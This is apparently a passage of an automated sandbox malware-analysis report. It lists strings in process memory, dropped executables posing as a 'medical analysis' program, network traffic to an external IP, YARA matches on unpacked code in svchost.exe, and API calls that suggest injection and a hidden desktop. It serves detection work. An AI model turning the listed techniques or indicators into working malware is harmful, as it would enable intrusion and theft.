                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513205293.0000643402274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513059730.0000643402213000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                      Source: chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                      Source: prefs.js.10.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498145632.0000643402D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: chrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: chrome.exe, 00000011.00000002.2517213852.0000643402960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                      Source: chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515512393.0000643402680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                      Source: chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515512393.0000643402680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                      Source: chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515512393.0000643402680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                      Source: chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                      Source: chrome.exe, 00000011.00000002.2513271848.000064340228C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                      Source: chrome.exe, 00000011.00000002.2513479498.00006434022B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                      Source: chrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                      Source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: svchost.exe, 00000010.00000003.2503143404.0000018B295DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2502586985.0000018B2C691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2506989421.0000018B295CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2502718278.0000018B2C628000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2536987780.0000018B295CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: svchost.exe, 00000010.00000003.2502718278.0000018B2C605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: svchost.exe, 00000010.00000003.2503143404.0000018B295DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2502586985.0000018B2C691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2506989421.0000018B295CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2502718278.0000018B2C628000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2536987780.0000018B295CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: svchost.exe, 00000010.00000003.2502718278.0000018B2C605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: chrome.exe, 00000011.00000002.2518617463.0000643402BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/nC
                      Source: medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: chrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                      Source: chrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                      Source: medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515601164.00006434026A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: chrome.exe, 00000011.00000002.2514699100.00006434024A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2517253822.000064340297C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                      Source: chrome.exe, 00000011.00000002.2517253822.000064340297C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gsOpen
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoceType)word_value
                      Source: chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoes)rowidmes
                      Source: chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoing
                      Source: chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                      Source: chrome.exe, 00000011.00000002.2513059730.0000643402213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                      Source: chrome.exe, 00000011.00000002.2516086377.000064340275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                      Source: chrome.exe, 00000011.00000002.2520134458.0000643402DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                      Source: chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownHTTPS traffic detected: 5.2.81.126:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: svchost.exe, 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_9507a306-2
                      Source: svchost.exe, 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_8848532a-7
                      Source: Yara matchFile source: 7.3.svchost.exe.5500000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.svchost.exe.52e0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.svchost.exe.5500000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.svchost.exe.52e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5284, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp1C31.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp1C61.tmpJump to dropped file
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6008CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,16_3_00007DF4AE6008CC
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_056D1D98 NtResumeThread,1_2_056D1D98
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0561F758 NtProtectVirtualMemory,1_2_0561F758
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0561F751 NtProtectVirtualMemory,1_2_0561F751
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60E910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,16_3_00007DF4AE60E910
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60E3E8 NtAcceptConnectPort,16_3_00007DF4AE60E3E8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60E3C8 NtAcceptConnectPort,16_3_00007DF4AE60E3C8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60F180 malloc,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,16_3_00007DF4AE60F180
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60E25C NtAcceptConnectPort,16_3_00007DF4AE60E25C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60F32C NtAcceptConnectPort,free,16_3_00007DF4AE60F32C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60E094 NtAcceptConnectPort,16_3_00007DF4AE60E094
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60E170 NtAcceptConnectPort,16_3_00007DF4AE60E170
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60E150 NtAcceptConnectPort,16_3_00007DF4AE60E150
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000018B292A15C0 NtAcceptConnectPort,16_2_0000018B292A15C0
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000018B292A1CF4 NtAcceptConnectPort,CloseHandle,16_2_0000018B292A1CF4
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C12A20 NtAcceptConnectPort,21_2_00000242C8C12A20
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C12CAC NtAcceptConnectPort,21_2_00000242C8C12CAC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C12DDC NtAcceptConnectPort,21_2_00000242C8C12DDC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C12DAC NtAcceptConnectPort,21_2_00000242C8C12DAC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C12D80 NtAcceptConnectPort,21_2_00000242C8C12D80
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C12EC8 NtAcceptConnectPort,21_2_00000242C8C12EC8
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C12E84 NtAcceptConnectPort,21_2_00000242C8C12E84
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C13158 NtAcceptConnectPort,21_2_00000242C8C13158
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1290C NtAcceptConnectPort,21_2_00000242C8C1290C
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE72C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7BDE72C54
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE71C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7BDE71C0C
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE766C40_2_00007FF7BDE766C4
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE740C40_2_00007FF7BDE740C4
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE72DB40_2_00007FF7BDE72DB4
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE76CA40_2_00007FF7BDE76CA4
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE75D900_2_00007FF7BDE75D90
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE71D280_2_00007FF7BDE71D28
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE71C0C0_2_00007FF7BDE71C0C
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE735300_2_00007FF7BDE73530
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_055D5A201_2_055D5A20
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_055D22581_2_055D2258
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05686E5B1_2_05686E5B
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B17C01_2_021B17C0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B1A1F1_2_021B1A1F
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B37BA1_2_021B37BA
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B2E381_2_021B2E38
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B2E291_2_021B2E29
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B37BA1_2_021B37BA
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0561BDC81_2_0561BDC8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0561BD701_2_0561BD70
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0561BDBA1_2_0561BDBA
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057905F81_2_057905F8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057984D01_2_057984D0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05794B501_2_05794B50
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057915F11_2_057915F1
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057906A81_2_057906A8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057961681_2_05796168
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05794E871_2_05794E87
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C7B981_2_057C7B98
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C65481_2_057C6548
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C65381_2_057C6538
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C65031_2_057C6503
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C04481_2_057C0448
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C04381_2_057C0438
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C64B81_2_057C64B8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C80871_2_057C8087
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C83DF1_2_057C83DF
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C7B891_2_057C7B89
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05939DE01_2_05939DE0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05939DD01_2_05939DD0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0593D7A81_2_0593D7A8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0593CFC51_2_0593CFC5
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0593CF381_2_0593CF38
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0593CF281_2_0593CF28
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0593C1F71_2_0593C1F7
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0593D0841_2_0593D084
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_059348F81_2_059348F8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_0593EBF41_2_0593EBF4
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05C3F0701_2_05C3F070
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05C3E5281_2_05C3E528
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05C200401_2_05C20040
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05C2001F1_2_05C2001F
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeCode function: 10_2_0098C0D010_2_0098C0D0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeCode function: 10_2_0098EDE810_2_0098EDE8
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeCode function: 10_2_0537000610_2_05370006
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeCode function: 10_2_0537004010_2_05370040
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B2C5216_3_0000018B293B2C52
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B4A5016_3_0000018B293B4A50
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B1BBC16_3_0000018B293B1BBC
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B27B216_3_0000018B293B27B2
